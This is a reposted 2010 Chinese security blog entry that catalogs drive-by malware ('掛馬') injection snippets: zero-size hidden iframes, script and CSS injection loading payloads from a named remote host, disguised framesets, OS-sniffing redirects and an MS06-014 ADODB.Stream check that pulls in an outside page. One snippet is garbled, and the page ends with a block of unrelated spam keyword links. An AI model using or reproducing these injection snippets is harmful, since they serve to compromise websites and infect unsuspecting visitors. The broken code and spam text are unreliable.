• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            小默

            【轉】常用的掛馬方式和系統判斷等代碼

            一:框架掛馬
            <iframe src=地址 width=0 height=0></iframe>

            二:js文件掛馬
            首先將以下代碼
            document.write("<iframe width=0 height=0 src=地址></iframe>");
            保存為xxx.js,
            則JS掛馬代碼為
            <script language=javascript src=xxx.js></script>

            三:js變形加密
            <SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
            muma.txt可改成任意后綴

            四:body掛馬
            <body onload="window.location=地址;"></body>

            五:隱蔽掛馬
            top.document.body.innerHTML = top.document.body.innerHTML + rn<iframe src=">;

            六:css中掛馬
            body {
            background-image: url(javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>"))}

            七:JAJA掛馬
            <SCRIPT language=javascript>
            window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
            </script>

            八:圖片偽裝
            <html>
            <iframe src="網馬地址" height=0 width=0></iframe>
            <img src="圖片地址"></center>
            </html>

            九:偽裝調用:
            <frameset rows="444,0" cols="*">
            <frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
            <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
            </frameset>

            十:高級欺騙
            <a href="
            <SCRIPT Language="JavaScript">
            function www_163_com ()
            {
            var url="網馬地址";
            open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
            }
            </SCRIPT>

            十一:判斷系統代碼

            <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
            <HTML><HEAD><TITLE>404</TITLE>
            <META http-equiv=Content-Type content="text/html; charset=windows-1252">
            <META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
            <BODY>
            <SCRIPT language=javascript>
            window.status="";
            if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
            window.location.href="tk.htm";
            else
            window.location.href="upx06014.htm";
            </SCRIPT>
            </BODY></HTML>

            十二:判斷是否有ms06014代碼

            <script language=VBScript>
            on error resume next
            set server = document.createElement("object")
            server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
            set File = server.createobject(Adodb.Stream,"")
            if Not Err.Number = 0 then
            err.clear
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            else
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            end if
            </script>

            十三:智能讀取js的代碼demo

            //讀娶src的對象
            var v = document.getElementById("advjs");
            //讀娶src的參數
            var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute(src));

            document.write("<iframe src="document.writeln("<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">");
            document.writeln("<HTML><HEAD>");
            document.writeln("<META http-equiv=Content-Type content="text/html; charset=big5">");
            document.writeln("<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>");
            document.writeln("<BODY> ");
            document.writeln("<DIV style="CURSOR: url(
            document.writeln("style="CURSOR: url(

            //分析src的參數函數
            function getUrlParameterAdv(asName,lsURL){

            loU = lsURL.split("?");
            if (loU.length>1){

            var loallPm = loU[1].split("&");

            for (var i=0; i<loallPm.length; i++){
            var loPm = loallPm[i].split("=");
            if (loPm[0]==asName){
            if (loPm.length>1){
            return loPm[1];
            }else{
            return "";
            }
            }
            }
            }
            return null;
            }

            posted on 2010-05-15 07:49 小默 閱讀(266) 評論(0)  編輯 收藏 引用 所屬分類: Security

            導航

            統計

            留言簿(13)

            隨筆分類(287)

            隨筆檔案(289)

            漏洞

            搜索

            積分與排名

            最新評論

            閱讀排行榜

            一本久久a久久精品vr综合| 国产综合免费精品久久久| AV无码久久久久不卡蜜桃| 亚洲国产精品无码久久久不卡| 久久久久av无码免费网| 99久久精品国产免看国产一区| 国产91久久综合| 日日噜噜夜夜狠狠久久丁香五月| 国产精品久久99| 亚洲国产成人久久综合区| 精品午夜久久福利大片| 亚洲日韩欧美一区久久久久我| 国产精品女同久久久久电影院| 国产午夜福利精品久久| 久久久婷婷五月亚洲97号色| 久久久中文字幕日本| 99久久免费国产特黄| 少妇人妻综合久久中文字幕| 999久久久国产精品| 久久天天躁狠狠躁夜夜网站| 性做久久久久久免费观看| 久久久久综合网久久| 久久夜色精品国产噜噜噜亚洲AV| 久久久久久毛片免费看| 久久96国产精品久久久| 亚洲午夜久久久影院| 亚洲综合久久夜AV | 久久综合久久鬼色| 九九久久精品国产| 中文精品久久久久国产网址| 99久久综合狠狠综合久久止| 久久精品国产亚洲AV麻豆网站 | 国产精品美女久久久免费| 久久综合给合久久狠狠狠97色69| 久久中文字幕精品| 久久免费看黄a级毛片| 久久91精品国产91| 久久精品久久久久观看99水蜜桃| 国内精品伊人久久久久妇| 久久这里的只有是精品23| 国产欧美久久久精品影院|